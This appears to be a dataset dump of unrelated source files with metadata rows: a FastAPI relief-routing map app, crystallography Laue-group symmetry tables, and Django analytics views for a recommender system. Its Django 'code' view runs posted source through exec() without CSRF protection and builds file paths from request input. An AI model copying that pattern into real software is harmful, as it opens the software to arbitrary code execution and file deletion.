newRow2.appendChild(cell2);
}
newBody2.appendChild(newRow2);
}
for(var x in display_data[k]){
let cell = document.createElement("td");
cell.innerText = display_data[k][x];
newRow.appendChild(cell);
}
newBody.appendChild(newRow);
}
}
document.getElementById("submit").onclick = function () {
var requestOptions = {
method: 'POST',
redirect: 'follow'
};
fetch(baseUrl+"tableUpdate/?number="+document.getElementById("number").value+"&dmnd="+document.getElementById("dmnd").value+"&reli="+document.getElementById("reli").value, requestOptions)
.then(response => response.json())
.then(result => {
console.log(result),
alert("Your request to add "+document.getElementById('number').value+" people in relief point "+document.getElementById('reli').value+" from demand node "+document.getElementById('dmnd').value+" has been sucessfully processed.\\nServer response: "+ result["msg"]);
})
.catch(error => console.log('error', error));
};
const myloc = {
lat: 27.302524795918504,
lng: 88.59751338243387
};
var Locations = [
['1', 'Demand', 27.302524795918504, 88.59751338243387, '&dmnd=1'],
['2', 'Demand', 27.309941653731695, 88.59884377512124, '&dmnd=2'],
['3', 'Demand', 27.30582333235349, 88.58828660114838, '&dmnd=3'],
['4', 'Demand', 27.310361103820796, 88.60686894416531, '&dmnd=4'],
['5', 'Demand', 27.293448382503307, 88.5876643286917, '&dmnd=5'],
['6', 'Demand', 27.30007442244496, 88.60322313404959, '&dmnd=6'],
['7', 'Demand', 27.290731480800943, 88.59953239709199, '&dmnd=7'],
['8', 'Demand', 27.29443927704333, 88.60976569341749, '&dmnd=8'],
['1', 'Relief', 27.29908312298845, 88.59850259606205, '&reli=1'],
['2', 'Relief', 27.316052526734996, 88.60438310868761, '&reli=2'],
['3', 'Relief', 27.31059938203764, 88.58867470419628, '&reli=3'],
['4', 'Relief', 27.308425729881044, 88.60326660562897, '&reli=4'],
['5', 'Relief', 27.296108563399272, 88.59755852842592, '&reli=5'],
['6', 'Relief', 27.29565087437993, 88.60086281523137, '&reli=6'],
['7', 'Relief', 27.291570492233568, 88.59506962480899, '&reli=7'],
['8', 'Relief', 27.288786566493226, 88.59927488945574, '&reli=8'],
];
const map = new google.maps.Map(document.getElementById('map'), {
zoom: 14,
center: myloc,
});
var infowindow = new google.maps.InfoWindow();
var marker, i;
var DemandIcon = {
path: google.maps.SymbolPath.CIRCLE,
fillOpacity: 1,
fillColor: '#ffffff',
strokeOpacity: 1,
strokeWeight: 1,
strokeColor: '#333',
scale: 12
};
var ReliefIcon = {
path: google.maps.SymbolPath.CIRCLE,
fillOpacity: 1,
fillColor: '#000000',
strokeOpacity: 1,
strokeWeight: 1,
strokeColor: '#333',
scale: 12
};
function setMarkers(){
for (i = 0; i < Locations.length; i++) {
if (Locations[i][1] == "Demand" && dmnd.includes(Locations[i][0])){
marker = new google.maps.Marker({
position: new google.maps.LatLng(Locations[i][2], Locations[i][3]),
map: map,
icon: ReliefIcon,
label: {color: '#ffffff', fontSize: '12px', fontWeight: '600',
text: Locations[i][0]}
});
}
else if (Locations[i][1] == "Relief" && reli.includes(Locations[i][0])){
marker = new google.maps.Marker({
position: new google.maps.LatLng(Locations[i][2], Locations[i][3]),
map: map,
icon: DemandIcon,
label: {color: '#000000', fontSize: '12px', fontWeight: '600',
text: Locations[i][0]}
});
}
}
}
function initDirMap() {
var red, green, blue;
if ( reliability < 0.25 )
{
green = Math.round((reliability * 4 * 255));
red = 255;
}
else
{
green = 255;
red = Math.round(((2 - 4 * reliability) * 255));
}
const rgbToHex = (r, g, b) => '#' + [r, g, b].map(x => {
const hex = x.toString(16)
return hex.length === 1 ? '0' + hex : hex
}).join('')
for (i = 0; i < Locations.length; i++) {
if (Locations[i][1] == "Demand" && dmnd.includes(Locations[i][0])){
origin_lat = Locations[i][2];
origin_lng = Locations[i][3];
}
else if (Locations[i][1] == "Relief" && reli.includes(Locations[i][0])){
dest_lat = Locations[i][2];
dest_lng = Locations[i][3];
}
}
const directionsRenderer = new google.maps.DirectionsRenderer({suppressMarkers: true, polylineOptions: { strokeColor: rgbToHex(red,green,0) }});
const directionsService = new google.maps.DirectionsService();
directionsRenderer.setMap(map);
directionsRenderer.setPanel(document.getElementById("sidebar"));
directionsService
.route({
origin: {
lat : origin_lat,
lng : origin_lng,
},
destination:{
lat: dest_lat,
lng: dest_lng,
},
travelMode: google.maps.TravelMode.DRIVING,
})
.then((response) => {
directionsRenderer.setDirections(response);
})
.catch((e) => window.alert("Directions request failed due to " + status));
}
</script>
</body>
</html>
"""
app = FastAPI()
app.mount("/Data", StaticFiles(directory="Data"), name="Data")
class entry(BaseModel):
number: int
key: str
@app.get("/")
def create_table():
return HTMLResponse(content = main_html_content, status_code = 200)
@app.get("/init/")
async def init_table():
df = pd.read_csv("Data/data.csv", encoding= "unicode_escape")
# Selecting by decision
decision = df['Decision variable'].values[0:64].astype('float')
selected = list()
for idx, item in enumerate(decision):
if (item >= 0.1):
selected.append(idx)
# Output DataFrame with selected coulumns
display_df = df.loc[selected, ['Paths' , 'Connectivity Reliability of paths (P)', \
'Number of trips (Population)', 'Reserve capacity (PCU)']]
display_df['Unserved population'] = display_df['Number of trips (Population)'] - \
display_df['Reserve capacity (PCU)']
display_df['Demand Nodes'] = display_df['Paths'].astype(str).str[1].astype(int)
display_df['Relief Points'] = display_df['Paths'].astype(str).str[3].astype(int)
display_df.drop(['Paths', 'Reserve capacity (PCU)'], axis=1, inplace=True)
display_df.reset_index(inplace = True, drop = True)
# Creating JSON for Frontend
# JSON "index": [Reliability value, Population served, Population unserved,
# Demand node, Relief point]
display_df.index += 1
with open('Data/display_data', 'w') as fp:
json.dump(display_df.T.to_dict('list'), fp, sort_keys=True, indent=4)
return HTMLResponse(content = main_html_content, status_code = 200)
@app.get("/setdemand/")
async def create_demand_node(dmnd: int):
return HTMLResponse(content = demand_html_content, status_code = 200)
@app.get("/setrelief/")
async def create_relief_node(reli: int):
return HTMLResponse(content = relief_html_content, status_code = 200)
@app.get("/handler/")
async def show_map(dmnd:int, reli: int):
return HTMLResponse(content = handler_html_content, status_code = 200)
@app.post("/tableUpdate/")
def update_table(number: int, dmnd: int, reli: int):
# JSON "index": [Reliability value, Population served, Population unserved,
# Demand node, Relief point]
with open('Data/display_data', 'r') as fp:
display_data = json.load(fp)
print("load sucessful")
print(display_data)
# Get Key and Number of People from request
# Check if Population unserved is negative, ie there is room for more population to serve
msg = ''
for row in display_data:
if (display_data[row][3] == dmnd and display_data[row][4] == reli):
if (display_data[row][2] > 0):
msg += "Relief point full. "
return JSONResponse({'msg': msg, 'status_code' : 400})
if (display_data[row][2] + number) <= 0:
display_data[row][2] += number
msg += "Update successful for %d people. "%(number)
with open('Data/display_data', 'w') as fp:
json.dump(display_data, fp, sort_keys=True, indent=4)
# Alert added to warn population limit after changes
if (display_data[row][2] > -1):
msg += "Cannot add anymore people. "
# Saving JSON at end of task
else:
msg += "Entered population value %d exceeds the population limit of the relief point. "%(number)
return JSONResponse({'msg': msg, 'status_code' : 400})
return JSONResponse({'msg': msg, 'status_code' : 200})
@app.post("/testpost/")
def testPost():
return JSONResponse({'msg': "test successfull", 'status_code' : 400})
| 38.48351
| 292
| 0.471921
| 5,761
| 61,843
| 5.040271
| 0.088873
| 0.040156
| 0.02149
| 0.015911
| 0.887178
| 0.875676
| 0.870338
| 0.865723
| 0.842305
| 0.840893
| 0
| 0.090725
| 0.394014
| 61,843
| 1,607
| 293
| 38.48351
| 0.684091
| 0.008602
| 0
| 0.814614
| 0
| 0.076455
| 0.95385
| 0.158548
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00203
| false
| 0
| 0.004736
| 0.001353
| 0.018268
| 0.001353
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
44807843256e92a032fdee4a402c40453c69e34a
| 150
|
py
|
Python
|
backend/models/__init__.py
|
Luanee/MoneyThreads
|
786610855ad4d4fdda4a25a95c9e4756c6a9dedf
|
[
"MIT"
] | null | null | null |
backend/models/__init__.py
|
Luanee/MoneyThreads
|
786610855ad4d4fdda4a25a95c9e4756c6a9dedf
|
[
"MIT"
] | null | null | null |
backend/models/__init__.py
|
Luanee/MoneyThreads
|
786610855ad4d4fdda4a25a95c9e4756c6a9dedf
|
[
"MIT"
] | null | null | null |
from backend.models.users import User
from backend.models.categories import CategoryModel, SubCategoryModel
from backend.models.tags import TagsModel
| 37.5
| 69
| 0.866667
| 19
| 150
| 6.842105
| 0.578947
| 0.253846
| 0.392308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086667
| 150
| 3
| 70
| 50
| 0.948905
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2b9435401333c66acf602e572fa9583cbd699ea0
| 6,411
|
py
|
Python
|
crystalbase/hkl/space_group.py
|
jingshenSN2/CrystalTool
|
18f07963ff5f2a54ac2c93e2fa59fada51346232
|
[
"MIT"
] | null | null | null |
crystalbase/hkl/space_group.py
|
jingshenSN2/CrystalTool
|
18f07963ff5f2a54ac2c93e2fa59fada51346232
|
[
"MIT"
] | null | null | null |
crystalbase/hkl/space_group.py
|
jingshenSN2/CrystalTool
|
18f07963ff5f2a54ac2c93e2fa59fada51346232
|
[
"MIT"
] | null | null | null |
def generate_pairs_by_laue(hkl_tuple, laue):
pairs = set()
h, k, l = hkl_tuple
params = {'h': h, 'k': k, 'l': l}
operation = symmetric_operations[laue]
for op in operation:
op_h, op_k, op_l = op
new_hkl_tuple = eval(op_h, params), eval(op_k, params), eval(op_l, params)
pairs.add(new_hkl_tuple)
return pairs
laue_group_name = {
0: '0',
1: '-1',
2: '2/m',
3: 'mmm',
4: '4/m',
5: '4/mmm',
6: '-3',
7: '-3(R)',
8: '-3m1',
9: '-31m',
10: '-3m(R)',
11: '6/m',
12: '6/mmm',
13: 'm-3',
14: 'm-3m'
}
symmetric_operations = {
0: [('h', 'k', 'l')], # no laue group
1: [('h', 'k', 'l'),
('-h', '-k', '-l')], # laue group: -1
2: [('h', 'k', 'l'),
('-h', 'k', '-l'),
('h', '-k', 'l'),
('-h', '-k', '-l')], # laue group: 2/m
3: [('h', 'k', 'l'),
('-h', '-k', '-l'),
('-h', 'k', 'l'),
('h', '-k', 'l'),
('h', 'k', '-l'),
('h', '-k', '-l'),
('-h', 'k', '-l'),
('-h', '-k', 'l')], # laue group: mmm
4: [('h', 'k', 'l'),
('-h', '-k', 'l'),
('-k', 'h', 'l'),
('k', '-h', 'l'),
('h', 'k', '-l'),
('-h', '-k', '-l'),
('-k', 'h', '-l'),
('k', '-h', '-l')], # laue group: 4/m
5: [('h', 'k', 'l'),
('-h', '-k', 'l'),
('h', '-k', 'l'),
('-h', 'k', 'l'),
('h', 'k', '-l'),
('-h', '-k', '-l'),
('h', '-k', '-l'),
('-h', 'k', '-l'),
('k', 'h', 'l'),
('-k', '-h', 'l'),
('-k', 'h', 'l'),
('k', '-h', 'l'),
('k', 'h', '-l'),
('-k', '-h', '-l'),
('-k', 'h', '-l'),
('k', '-h', '-l')], # laue group: 4/mmm
6: [('h', 'k', 'l'),
('-h-k', 'h', 'l'),
('k', '-h-k', 'l'),
('-h', '-k', '-l'),
('h+k', '-h', '-l'),
('-k', 'h+k', '-l')], # laue group: -3
7: [('h', 'k', 'l'),
('l', 'h', 'k'),
('k', 'l', 'h'),
('-h', '-k', '-l'),
('-l', '-h', '-k'),
('-k', '-l', '-h')], # laue group: -3(R)
8: [('h', 'k', 'l'),
('-h-k', 'h', 'l'),
('k', '-h-k', 'l'),
('-h', '-k', '-l'),
('h+k', '-h', '-l'),
('-k', 'h+k', '-l'),
('k', 'h', '-l'),
('h', '-h-k', '-l'),
('-h-k', 'k', '-l'),
('-k', '-h', 'l'),
('-h', 'h+k', 'l'),
('h+k', '-k', 'l')], # laue group: -3m1
9: [('h', 'k', 'l'),
('-h-k', 'h', 'l'),
('k', '-h-k', 'l'),
('-h', '-k', '-l'),
('h+k', '-h', '-l'),
('-k', 'h+k', '-l'),
('k', 'h', 'l'),
('h', '-h-k', 'l'),
('-h-k', 'k', 'l'),
('-k', '-h', '-l'),
('-h', 'h+k', '-l'),
('h+k', '-k', '-l')], # laue group: -31m
10: [('h', 'k', 'l'),
('k', 'l', 'h'),
('l', 'h', 'k'),
('k', 'h', 'l'),
('h', 'l', 'k'),
('l', 'k', 'h'),
('-h', '-k', '-l'),
('-k', '-l', '-h'),
('-l', '-h', '-k'),
('-k', '-h', '-l'),
('-h', '-l', '-k'),
('-l', '-k', '-h')], # laue group: -3m(R)
11: [('h', 'k', 'l'),
('-h-k', 'h', 'l'),
('k', '-h-k', 'l'),
('-h', '-k', 'l'),
('h+k', '-h', 'l'),
('-k', 'h+k', 'l'),
('h', 'k', '-l'),
('-h-k', 'h', '-l'),
('k', '-h-k', '-l'),
('-h', '-k', '-l'),
('h+k', '-h', '-l'),
('-k', 'h+k', '-l')], # laue group: 6/m
12: [('h', 'k', 'l'),
('-h-k', 'h', 'l'),
('k', '-h-k', 'l'),
('-h', '-k', 'l'),
('h+k', '-h', 'l'),
('-k', 'h+k', 'l'),
('k', 'h', 'l'),
('-h-k', 'k', 'l'),
('h', '-h-k', 'l'),
('-k', '-h', 'l'),
('h+k', '-k', 'l'),
('-h', 'h+k', 'l'),
('h', 'k', '-l'),
('-h-k', 'h', '-l'),
('k', '-h-k', '-l'),
('-h', '-k', '-l'),
('h+k', '-h', '-l'),
('-k', 'h+k', '-l'),
('k', 'h', '-l'),
('-h-k', 'k', '-l'),
('h', '-h-k', '-l'),
('-k', '-h', '-l'),
('h+k', '-k', '-l'),
('-h', 'h+k', '-l')], # laue group: 6/mmm
13: [('h', 'k', 'l'),
('l', 'h', 'k'),
('k', 'l', 'h'),
('h', 'k', '-l'),
('-l', 'h', 'k'),
('k', '-l', 'h'),
('h', '-k', 'l'),
('l', 'h', '-k'),
('-k', 'l', 'h'),
('h', '-k', '-l'),
('-l', 'h', '-k'),
('-k', '-l', 'h'),
('-h', 'k', 'l'),
('l', '-h', 'k'),
('k', 'l', '-h'),
('-h', 'k', '-l'),
('-l', '-h', 'k'),
('k', '-l', '-h'),
('-h', '-k', 'l'),
('l', '-h', '-k'),
('-k', 'l', '-h'),
('-h', '-k', '-l'),
('-l', '-h', '-k'),
('-k', '-l', '-h')], # laue group: m-3
14: [('h', 'k', 'l'),
('h', 'l', 'k'),
('l', 'h', 'k'),
('l', 'k', 'h'),
('k', 'h', 'l'),
('k', 'l', 'h'),
('h', 'k', '-l'),
('h', '-l', 'k'),
('-l', 'h', 'k'),
('-l', 'k', 'h'),
('k', 'h', '-l'),
('k', '-l', 'h'),
('h', '-k', 'l'),
('h', 'l', '-k'),
('l', 'h', '-k'),
('l', '-k', 'h'),
('-k', 'h', 'l'),
('-k', 'l', 'h'),
('h', '-k', '-l'),
('h', '-l', '-k'),
('-l', 'h', '-k'),
('-l', '-k', 'h'),
('-k', 'h', '-l'),
('-k', '-l', 'h'),
('-h', 'k', 'l'),
('-h', 'l', 'k'),
('l', '-h', 'k'),
('l', 'k', '-h'),
('k', '-h', 'l'),
('k', 'l', '-h'),
('-h', 'k', '-l'),
('-h', '-l', 'k'),
('-l', '-h', 'k'),
('-l', 'k', '-h'),
('k', '-h', '-l'),
('k', '-l', '-h'),
('-h', '-k', 'l'),
('-h', 'l', '-k'),
('l', '-h', '-k'),
('l', '-k', '-h'),
('-k', '-h', 'l'),
('-k', 'l', '-h'),
('-h', '-k', '-l'),
('-h', '-l', '-k'),
('-l', '-h', '-k'),
('-l', '-k', '-h'),
('-k', '-h', '-l'),
('-k', '-l', '-h')] # laue group: m-3m
}
if __name__ == '__main__':
for i in range(1, 15):
generate_pairs_by_laue((1, 2, 3), i)
| 27.633621
| 82
| 0.185618
| 818
| 6,411
| 1.418093
| 0.062347
| 0.232759
| 0.237931
| 0.189655
| 0.64569
| 0.64569
| 0.626724
| 0.626724
| 0.613793
| 0.613793
| 0
| 0.019723
| 0.391047
| 6,411
| 231
| 83
| 27.753247
| 0.277408
| 0.038528
| 0
| 0.687225
| 1
| 0
| 0.167209
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004405
| false
| 0
| 0
| 0
| 0.008811
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2be1d2e0194261030706276985b1895671a259ad
| 14,903
|
py
|
Python
|
alarm/views.py
|
LFMP/ALARM
|
b310ebb53525826bb588bab983a45c14560c4863
|
[
"MIT"
] | 1
|
2021-01-11T18:39:27.000Z
|
2021-01-11T18:39:27.000Z
|
alarm/views.py
|
kiminh/ALARM
|
b310ebb53525826bb588bab983a45c14560c4863
|
[
"MIT"
] | null | null | null |
alarm/views.py
|
kiminh/ALARM
|
b310ebb53525826bb588bab983a45c14560c4863
|
[
"MIT"
] | 3
|
2019-08-29T22:52:20.000Z
|
2021-07-15T22:51:29.000Z
|
import json, datetime, os
from django.http import HttpResponse, HttpResponseRedirect, JsonResponse
from django.shortcuts import redirect, render
from webapp.models import Adapters, Post, RecomendacaoAcessada, RecomendacaoGerada
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
from statistics import median
@login_required(login_url='../admin/login/')
def quantidadeRecGeradasPorHora(request):
dados = {}
hours = []
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
for i in lista:
for hora in range(25):
hours.append(RecomendacaoGerada.objects.filter(rid=i["rid"],date__year =str(today.year),date__month =str(today.month), date__day = str(today.day),date__hour=hora).count())
inf = {i["rid"]:hours}
hours = []
dados.update(inf)
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecGeradasPorDia(request):
dados = {}
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
for i in lista:
inf = {i["rid"]:RecomendacaoGerada.objects.filter(rid=i["rid"],date__istartswith=today).count()}
dados.update(inf)
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecGeradasPorMes(request):
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
month = format(today.month,'02d')
year = today.year
dias = []
dados = {}
for j in lista:
for i in range (1,today.day+1):
dias.append(RecomendacaoGerada.objects.filter(rid=j["rid"],date__year=str(year), date__month = str(month),date__day = format(i, '02d')).count())
inf = {j["rid"]:dias}
dias = []
dados.update(inf)
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecGeradasPorAno(request):
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
year = str(today.year)
dados = {}
days = {}
for i in lista:
eachRec = RecomendacaoGerada.objects.filter(rid=i["rid"])
for j in eachRec:
day = str(j.date)
day = day[:10]
if day not in days:
days.update({day: eachRec.filter(date__istartswith=day,date__year =year).count()})
inf = {i["rid"]:days}
days = {}
dados.update(inf)
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAcessadasPorHora(request):
dados = {}
hours = []
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
for i in lista:
for hora in range(25):
hours.append(RecomendacaoAcessada.objects.filter(rid=i["rid"],date__year =str(today.year),date__month =str(today.month), date__day = str(today.day),date__hour=hora).count())
inf = {i["rid"]:hours}
hours = []
dados.update(inf)
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAcessadasPorDia(request):
dados = {}
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
for i in lista:
inf = {i["rid"]:RecomendacaoAcessada.objects.filter(rid=i["rid"],date__istartswith=today).count()}
dados.update(inf)
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAcessadasPorMes(request):
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
month = format(today.month,'02d')
year = today.year
dias = []
dados = {}
for j in lista:
for i in range (1,today.day+1):
dias.append(RecomendacaoAcessada.objects.filter(rid=j["rid"],date__year=str(year), date__month = str(month),date__day = format(i, '02d')).count())
inf = {j["rid"]:dias}
dias = []
dados.update(inf)
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAcessadasPorAno(request):
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
year = str(today.year)
dados = {}
days = {}
for i in lista:
eachRec = RecomendacaoAcessada.objects.filter(rid=i["rid"])
for j in eachRec:
day = str(j.date)
day = day[:10]
if day not in days:
days.update({day: eachRec.filter(date__istartswith=day,date__year =year).count()})
inf = {i["rid"]:days}
days = {}
dados.update(inf)
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAderidasPorDia(request):
dados = {}
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
cliquetotal = Post.objects.filter(dateR__istartswith = today).count()
cliquerestante = 0
for i in lista:
inf = {i["rid"]:RecomendacaoAcessada.objects.filter(rid=i["rid"],date__istartswith=today).count()}
dados.update(inf)
cliquerestante = cliquerestante + dados[i["rid"]]
dados.update({"Não-recomendado":cliquetotal - cliquerestante})
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAderidasPorMes(request):
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
month = format(today.month,'02d')
year = today.year
dias = []
dados = {}
cliquetotal = Post.objects.filter(dateR__year = str(year),dateR__month = str(month)).count()
cliquerestante = 0
for j in lista:
dados.update({j["rid"]:RecomendacaoAcessada.objects.filter(rid=j["rid"],date__year=str(year), date__month = str(month)).count()})
cliquerestante = cliquerestante + dados[j["rid"]]
dados.update({"Não-recomendado": cliquetotal - cliquerestante })
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAderidasPorAno(request):
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
year = str(today.year)
dados = {}
cliquerestante = 0
cliquetotal = Post.objects.filter(dateR__year = str(year)).count()
for i in lista:
eachRec = RecomendacaoAcessada.objects.filter(rid=i["rid"], date__year = year).count()
dados.update({i["rid"]:eachRec})
cliquerestante = cliquerestante + dados[i["rid"]]
dados.update({"Não-recomendado": cliquetotal - cliquerestante })
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAderidasPorGeracaoPorDia(request):
dados = {}
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
cliquetotal = RecomendacaoGerada.objects.filter(date__istartswith = today).count()
cliquerestante = 0
for i in lista:
inf = {i["rid"]:RecomendacaoAcessada.objects.filter(rid=i["rid"],date__istartswith=today).count()}
dados.update(inf)
cliquerestante = cliquerestante + dados[i["rid"]]
dados.update({"Não-Clicada":cliquetotal - cliquerestante})
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAderidasPorGeracaoPorMes(request):
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
month = format(today.month,'02d')
year = today.year
dias = []
dados = {}
cliquetotal = RecomendacaoGerada.objects.filter(date__year = str(year),date__month = str(month)).count()
cliquerestante = 0
for j in lista:
dados.update({j["rid"]:RecomendacaoAcessada.objects.filter(rid=j["rid"],date__year=str(year), date__month = str(month)).count()})
cliquerestante = cliquerestante + dados[j["rid"]]
dados.update({"Não-Clicada": cliquetotal - cliquerestante })
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecAderidasPorGeracaoPorAno(request):
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
year = str(today.year)
dados = {}
cliquerestante = 0
cliquetotal = RecomendacaoGerada.objects.filter(date__year = str(year)).count()
for i in lista:
eachRec = RecomendacaoAcessada.objects.filter(rid=i["rid"], date__year = year).count()
dados.update({i["rid"]:eachRec})
cliquerestante = cliquerestante + dados[i["rid"]]
dados.update({"Não-Clicada": cliquetotal - cliquerestante })
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecMinima(request):
dados = {}
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
dias = {}
eficiencia = []
for i in lista:
for dia in range(32):
quatidadeGerada = RecomendacaoGerada.objects.filter(rid = i["rid"], date__year = str(today.year), date__month = str(today.month), date__day = str(dia)).count()
quatidadeAcessada = RecomendacaoAcessada.objects.filter(rid = i["rid"], date__year = str(today.year), date__month = str(today.month), date__day = str(dia)).count()
if quatidadeGerada != 0 and quatidadeAcessada != 0:
eficiencia.append(quatidadeAcessada/quatidadeGerada * 100)
if eficiencia == []:
dados.update({i["rid"]:0})
else:
dados.update({i["rid"]:min(eficiencia)})
eficiencia = []
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecMedia(request):
dados = {}
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
dias = {}
eficiencia = []
for i in lista:
for dia in range(32):
quatidadeGerada = RecomendacaoGerada.objects.filter(rid = i["rid"], date__year = str(today.year), date__month = str(today.month), date__day = str(dia)).count()
quatidadeAcessada = RecomendacaoAcessada.objects.filter(rid = i["rid"], date__year = str(today.year), date__month = str(today.month), date__day = str(dia)).count()
if quatidadeGerada != 0 and quatidadeAcessada != 0:
eficiencia.append(quatidadeAcessada/quatidadeGerada * 100)
if eficiencia == []:
dados.update({i["rid"]:0})
else:
dados.update({i["rid"]:median(eficiencia)})
eficiencia = []
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def quantidadeRecMaxima(request):
dados = {}
lista = Adapters.objects.filter(ativo=1).values("rid")
today = datetime.date.today()
dias = {}
eficiencia = []
for i in lista:
for dia in range(32):
quatidadeGerada = RecomendacaoGerada.objects.filter(rid = i["rid"], date__year = str(today.year), date__month = str(today.month), date__day = str(dia)).count()
quatidadeAcessada = RecomendacaoAcessada.objects.filter(rid = i["rid"], date__year = str(today.year), date__month = str(today.month), date__day = str(dia)).count()
if quatidadeGerada != 0 and quatidadeAcessada != 0:
eficiencia.append(quatidadeAcessada/quatidadeGerada * 100)
if eficiencia == []:
dados.update({i["rid"]:0})
else:
dados.update({i["rid"]:max(eficiencia)})
eficiencia = []
return JsonResponse(dados)
@login_required(login_url='../admin/login/')
def recomenderclick(request):
return JsonResponse({"caminho":"ok"})
@login_required(login_url='../admin/login/')
@csrf_exempt
def code(request):
if request.method == 'POST':
data = json.loads(request.body.decode('UTF-8'))
fileName = data["nome"]
codigo = data["valor"]
dir_path = os.path.dirname(os.path.realpath(__file__))
dir_path = dir_path.replace('alarm','webapp/algorithms/'+ fileName + '.py')
try:
exec('from random import randint\n'+codigo+'\n'+'count = Post.objects.count()\n'+'random_object = Post.objects.all()[randint(0, count - 1)]\n'+fileName+'(request,random_object)')
except Exception as ex:
return HttpResponse(json.dumps({"type":type(ex).__name__ , "args" : str(ex.args)}),status=404)
else:
if not os.path.exists(dir_path):
file = open(dir_path, "w+")
file.write(codigo)
novoRecomendador = Adapters(fileName,1)
novoRecomendador.save()
return HttpResponse(status=204)
return HttpResponse(json.dumps({"type":"Arquivo já existente com este nome" , "args" : "Mude-o!"}),status=404)
else:
return render(request,"admin/code-editor/code-editor.html")
@login_required(login_url='../admin/login/')
@csrf_exempt
def toggleRecommendator(request):
if(request.method == 'POST'):
data = json.loads(request.body.decode('UTF-8'))
name = data["nome"]
value = data["value"]
element = Adapters.objects.get(rid=name)
element.ativo = value
element.save()
return HttpResponse(status=204)
else:
lista = Adapters.objects.values()
adap = {}
for i in lista:
adap.update({i["rid"]:[str(i["ativo"])]})
return JsonResponse(adap)
@login_required(login_url='../admin/login/')
@csrf_exempt
def deleteRecommendator(request):
if (request.method == 'POST'):
data = json.loads(request.body.decode('UTF-8'))
fileName = data["name"] # contem o nome do recomendador a ser excluido
dir_path = os.path.dirname(os.path.realpath(__file__))
dir_path = dir_path.replace('alarm','webapp/algorithms/'+ fileName + '.py')
if os.path.exists(dir_path):
os.remove(dir_path)
Adapters.objects.get(rid = fileName).delete()
return HttpResponse(status=204)
try:
Adapters.objects.get(rid = fileName).delete()
except:
return HttpResponse(status=404)
return HttpResponse(status=200)
@login_required(login_url='../admin/login/')
@csrf_exempt
def visulizarRecommendator(request):
if (request.method == 'POST'):
data = json.loads(request.body.decode('UTF-8'))
fileName = data["name"] # contem o nome do recomendador a ser visualizado
dir_path = os.path.dirname(os.path.realpath(__file__))
dir_path = dir_path.replace('alarm','webapp/algorithms/'+ fileName + '.py')
if os.path.exists(dir_path):
file = open(dir_path, "r")
conteudo = {"conteudo":file.read(), "nome":fileName}
return JsonResponse(conteudo)
return HttpResponse(status=404)
return HttpResponse(status=200)
@login_required(login_url='../admin/login/')
def managercodes(request):
return render(request,"admin/toggle/toggleRecomender.html")
@login_required(login_url='../admin/login/')
def recomendacaoGerada(request):
return render(request,"admin/graficos/recomendacaogerada/recomendacaogerada.html")
@login_required(login_url='../admin/login/')
def recomendacaoAcessada(request):
return render(request,"admin/graficos/recomendacaoacessada/recomendacaoacessada.html")
@login_required(login_url='../admin/login/')
def recomendacaoAderida(request):
return render(request,"admin/graficos/recomendacaoaderida/recomendacaoaderida.html")
@login_required(login_url='../admin/login/')
